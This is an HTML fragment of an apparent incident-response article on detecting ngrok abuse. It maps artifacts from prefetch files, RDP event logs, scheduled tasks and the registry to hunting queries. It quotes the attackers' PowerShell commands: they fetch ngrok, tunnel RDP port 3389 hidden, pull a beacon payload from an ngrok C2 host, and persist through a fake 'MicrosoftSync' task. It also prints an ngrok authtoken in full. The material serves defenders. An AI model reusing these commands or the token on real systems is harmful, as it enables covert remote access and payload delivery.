data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Static variable<\/strong> &gt; <span style=\"color: 
#99cc00\"><strong>ngrok.yml<\/strong><\/span><\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Query<\/strong> &gt; Sophos_file_journal\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">subject\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">FileOtherReads<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">path\n<ul>\n<li data-leveltext=\"o\" 
data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">%ngrok.yml<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>File.01.0 &#8211; Files on disk (path)<\/strong>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Finding<\/strong> &gt; <span class=\"NormalTextRun SCXW149924267 BCX0\">Prefetch execution entry for <\/span><span class=\"NormalTextRun SCXW149924267 BCX0\">ngrok<\/span><span class=\"NormalTextRun SCXW149924267 BCX0\"> created via <\/span><span class=\"NormalTextRun SpellingErrorV2Themed SCXW149924267 BCX0\">svchost<\/span><span class=\"NormalTextRun SCXW149924267 BCX0\"> process<\/span><\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" 
data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Static variable<\/strong> &gt; <strong><span style=\"color: #99cc00\">NGROK.EXE%.pf<\/span><\/strong><\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Query<\/strong> &gt; $$path$$ &gt; <strong><span style=\"color: #99cc00\">C:\\Windows\\Prefetch\\NGROK.EXE%.pf<\/span><\/strong> (the % wildcard covers the path hash Windows appends to the .pf name; a renamed ngrok binary produces a .pf file under the new name, so pair this with the process journal command-line search)<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Process Journal<\/strong>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" 
data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Finding<\/strong> &gt; PowerShell.exe&#8221; \/c Start-Process -WindowStyle Hidden -FilePath ngrok.exe -ArgumentList &#8216;tcp 3389&#8217;\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Static variables<\/strong>\u00a0&gt; <span style=\"color: #99cc00\"><strong>ngrok | tcp 3389<\/strong><\/span><\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Query<\/strong> &gt; Sophos_process_journal\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">CMDLine\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier 
New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">ngrok<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">tcp 3389<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Finding<\/strong> &gt; &#8220;C:\\Windows\\system32\\ngrok.exe&#8221; tcp 3389\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Static variables<\/strong> &gt; <span style=\"color: #99cc00\"><strong>ngrok | tcp 3389<\/strong><\/span><\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" 
data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Query<\/strong> &gt; Sophos_process_journal\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">CMDLine\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">ngrok<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">tcp 3389<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" 
data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Windows Event Logs<\/strong> (Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx)\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Finding<\/strong> &gt; Source Network Address: ::%16777216 (a local, loopback-scoped source: the RDP session entered through the ngrok listener on the host itself, so the attacker&#8217;s real IP address is not recorded in this event and must be sought on the ngrok side)\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Static variable<\/strong> &gt; <span style=\"color: #99cc00\"><strong>::%16777216<\/strong><\/span><\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" 
data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Query<\/strong> &gt; Rapid Response: Logins.01.0 &#8211; 1149 RDP Logins\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">Source IP\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">%::%16777216%<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Windows Event Logs<\/strong> (Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx)\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier 
New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Finding<\/strong> &gt; Source Network Address: ::%16777216\n<ul>\n<li><strong>Static variable<\/strong> &gt; <span style=\"color: #99cc00\"><strong>::%16777216<\/strong><\/span><\/li>\n<li><strong>Query<\/strong> &gt; Rapid Response: Logins.01.2 &#8211; 21-40 local session login events\n<ul>\n<li>Source IP\n<ul>\n<li>%::%16777216%<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li><strong>Windows Event Logs<\/strong> (Microsoft-Windows-RemoteDesktopServices-RdpCoreTS%4Operational.evtx)\n<ul>\n<li><strong>Finding<\/strong> &gt; The server accepted a new TCP connection from client [::1]:51154\n<ul>\n<li><strong>Static variable<\/strong> &gt; <span style=\"color: #99cc00\"><strong>::1<\/strong><\/span><\/li>\n<li><strong>Query<\/strong> &gt; Unknown<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n
<li><strong>New IoC discovery<\/strong>\n<ul>\n<li>Scheduled task located that binds a pre-defined ngrok URL via the TCP protocol using port 3389\n<ul>\n<li><strong>Task name<\/strong> &gt; MicrosoftSync<\/li>\n<li><strong>Task action<\/strong> &gt; C:\\Windows\\Temp\\rk\\ngrok.exe<\/li>\n<li><strong>Task argument<\/strong> &gt; tcp --region=us --remote-addr=3.tcp.ngrok.io:25126 3389<\/li>\n<li><strong>Execute ngrok<\/strong> &gt; C:\\Windows\\Temp\\rk\\ngrok.exe<\/li>\n<li><strong>Protocol to use<\/strong> &gt; TCP<\/li>\n<li><strong>Region select<\/strong> &gt; us<\/li>\n<li><strong>Remote address<\/strong> &gt; 3.tcp.ngrok.io:25126 3389\n<ul>\n<li>URL &gt; 3.tcp.ngrok.io<\/li>\n<li>Port &gt; 25126<\/li>\n<li>Protocol &gt; 3389<\/li>\n<\/ul>\n<\/li>\n<li><strong>Task path<\/strong> &gt; C:\\Windows\\system32\\tasks\\Microsoft\\Windows\\MicrosoftSync.xml<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n
<li><strong>Tasks.01.0 &#8211; Scheduled Tasks<\/strong>\n<ul>\n<li><strong>Finding<\/strong> &gt; Scheduled task containing action argument parameters passed to the ngrok binary to start a 3389 tunnel via a predefined binding address\n<ul>\n<li><strong>Static variable<\/strong> &gt; <span style=\"color: #99cc00\"><strong>%ngrok%<\/strong><\/span>\n<ul>\n<li>If a remote address was supplied within the argument parameters of a scheduled task, the static part that could be searched for would be the second-level domain, which is ngrok\n<ul>\n<li>3.tcp.<span style=\"color: #99cc00\"><strong>ngrok<\/strong><\/span>.io:25126 3389\n<ul>\n<li>3 &gt; dynamic value<\/li>\n<li>tcp &gt; static, although it does not by itself attribute to ngrok<\/li>\n<li>ngrok &gt; static value for the second-level domain used by ngrok public services<\/li>\n<li>io &gt; static value at present<\/li>\n<li>25126 &gt; Dynamic \/ unknown static value (different tiering options)<\/li>\n<li>3389 &gt; Dynamic value (other ports could be bound)<\/li>\n<\/ul>\n<\/li>\n<li>%<\/li>\n<\/ul>\n<\/li>\n<li>$$action$$\n<ul>\n<li><span style=\"color: #99cc00\"><strong>%ngrok%<\/strong><\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
<h3><strong>Analyze<\/strong><\/h3>\n<p>The following information is based on intelligence gathered during two incident response investigations in which ngrok was introduced to the targeted network and abused by attackers.<\/p>\n<p><u>Incident One<\/u><\/p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li>RDP connections\n<ul>\n<li>Source network address: ::%16777216<\/li>\n<li>The server accepted a new TCP connection from client [::1]:52423<\/li>\n<\/ul>\n<\/li>\n<li>PowerShell downloads the ngrok archive, extracts it to disk, and starts the ngrok process\n<ul>\n<li>powershell.exe \/c (New-Object System.Net.WebClient).DownloadFile('https:\/\/bin.equinox.io\/c\/4VmDzA7iaHb\/ngrok-stable-windows-386.zip','ngrok.zip');Expand-Archive -Path 'ngrok.zip' -DestinationPath 'C:\\Windows\\System32';Start-Process -nnw -FilePath ngrok.exe -ArgumentList version EngineVersion=<\/li>\n<\/ul>\n<\/li>\n<li>PowerShell invokes ngrok and binds a TCP tunnel to port 3389\n<ul>\n<li>powershell.exe \/c Start-Process -WindowStyle Hidden -FilePath ngrok.exe -ArgumentList 'tcp 3389'\n<ul>\n<li>PowerShell executes the ngrok binary and sets up a TCP tunnel to port 3389<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li>PowerShell queries the local ngrok API on its default port, 4040\n<ul>\n<li>powershell.exe \/c (New-Object System.Net.WebClient).DownloadString('http:\/\/127.0.0.1:4040\/api\/tunnels')<\/li>\n<\/ul>\n<\/li>\n
<li>PowerShell invokes ngrok to communicate with a C2 server, retrieve a malicious payload, and write it to disk\n<ul>\n<li>powershell.exe \/c (new-object System.Net.WebClient).DownloadFile('http:\/\/2f65dfe21ccb.ngrok.io\/b3.exe','C:\\tmp\\beacon.exe')\n<ul>\n<li>PowerShell issues a web request to retrieve the file\n<ul>\n<li>http &gt; over the web protocol (port 80)<\/li>\n<li>2f65dfe21ccb &gt; subdomain assigned by the ngrok service (with paid versions this can remain static rather than dynamic)<\/li>\n<li>ngrok &gt; second-level domain for the ngrok service<\/li>\n<li>.io &gt; Top-level domain<\/li>\n<li>b3.exe &gt; Payload to retrieve from the attacker\u2019s web server via ngrok<\/li>\n<li>C:\\tmp\\beacon.exe &gt; Write b3.exe to disk at this location\n<ul>\n<li>Based on the name only, this is a form of beacon<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
<p><u>Incident Two<\/u><\/p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li>Wget (in PowerShell, an alias of Invoke-WebRequest) issues a web request to download an archive file containing an ngrok binary and then decompresses the archive. (Note: This was decoded from base64 SQB\u2026. Code)\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li>IEX (New-Object Net.Webclient).DownloadString('http:\/\/127.0.0.1:37448\/');<br \/> [Net.ServicePointManager]::SecurityProtocol = \"tls12, tls11, tls\";<br \/> [Net.ServicePointManager]::SecurityProtocol =<br \/> [Net.SecurityProtocolType]::Tls12 -bor<br \/> [Net.SecurityProtocolType]::Tls11 -bor<br \/> [Net.SecurityProtocolType]::Tls ; wget https:\/\/bin.equinox.io\/c\/4VmDzA7iaHb\/ngrok-stable-windows-amd64.zip -Outfile C:\\Windows\\Temp\\s.zip ; Expand-Archive -Path C:\\Windows\\Temp\\s.zip -DestinationPath C:\\Windows\\Temp\\rk<\/li>\n<li>Cobalt Strike local host port Beacon bind assignment<\/li>\n<li>All TLS versions are enabled so that the download succeeds regardless of which TLS version the server supports<\/li>\n<li>Web request to the equinox.io domain to download ngrok\n<ul>\n<li>ngrok-stable-windows-amd64.zip<\/li>\n<\/ul>\n<\/li>\n<li>Output the archive file to disk at location:\n<ul>\n<li>C:\\Windows\\Temp<\/li>\n<li>Name the archive file s.zip<\/li>\n<\/ul>\n<\/li>\n<li>Decompress the archive file to:\n<ul>\n<li>C:\\Windows\\Temp\\rk<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n
<li>Scheduled task located which binds a pre-defined ngrok URL via the TCP protocol using port 3389\n<ul>\n<li><strong>Task name<\/strong> &gt; MicrosoftSync<\/li>\n<li><strong>Task action<\/strong> &gt; C:\\Windows\\Temp\\rk\\ngrok.exe<\/li>\n<li><strong>Task argument<\/strong> &gt; tcp --region=us --remote-addr=3.tcp.ngrok.io:25126 3389\n<ul>\n<li><strong>Execute ngrok<\/strong> &gt; C:\\Windows\\Temp\\rk\\ngrok.exe<\/li>\n<li><strong>Protocol to use<\/strong> &gt; TCP<\/li>\n<li><strong>Region select<\/strong> &gt; us<\/li>\n<li><strong>Remote address<\/strong> &gt; 3.tcp.ngrok.io:25126 3389\n<ul>\n<li>URL &gt; 3.tcp.ngrok.io<\/li>\n<li>Port &gt; 25126<\/li>\n<li>Protocol &gt; 3389<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li><strong>Task path<\/strong> &gt; C:\\Windows\\system32\\tasks\\Microsoft\\Windows\\MicrosoftSync.xml<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
<p>Here, ngrok artifacts (based on the ngrok TCP 3389 binding and payload retrieval via web protocols) were found. These are listed below along with their locations. Values shown in green represent data that could be used to suggest ngrok presence \/ activity.<\/p>\n<ul>\n<li><b><span data-contrast=\"auto\"><u>File system<\/u><\/span><\/b>\n<ul>\n<li><strong>C:\\Users\\%\\.ngrok2\\ngrok.yml<\/strong>\n<ul>\n<li>This is the default location created by ngrok when the auth token is imported\n<ul>\n<li>ngrok.yml contents &gt; authtoken:2x51DsQKXfh5ktnL0QZoE02nP7V_378snElWViOptKDsXk8sM<\/li>\n<\/ul>\n<\/li>\n<li><strong>C:\\Windows\\Prefetch\\NGROK.EXE%.pf<\/strong>\n<ul>\n<li>Svchost.exe created a prefetch file when ngrok was executed via a PowerShell start process<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n
<li><strong><u>Registry<\/u><\/strong>\n<ul>\n<li>SYSTEM hive\n<ul>\n<li>HKLM\\SYSTEM\\ControlSet001\\Control\\Session Manager\\AppCompatCache\n<ul>\n<li>Cache entry value &gt; C:\\Users\\unknown\\Desktop\\<strong><span style=\"color: #99cc00\">ngrok.exe<\/span><\/strong>\n<ul>\n<li>Note:\n<ul>\n<li>If the ngrok binary did not use the default executable name <span style=\"color: #000000\"><strong>ngrok.exe<\/strong><\/span>, this artifact would be inconsequential, since the substitute name adversaries gave the binary would not match<\/li>\n<li>This artifact can suggest several different types of events have occurred, and is not a reliable source for execution date \/ time stamps. However, if the default naming convention remains in use, this artifact could suggest the presence of ngrok<\/li>\n<li>The entry\u2019s inherent timestamp is the last-modification time of the binary executable<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n
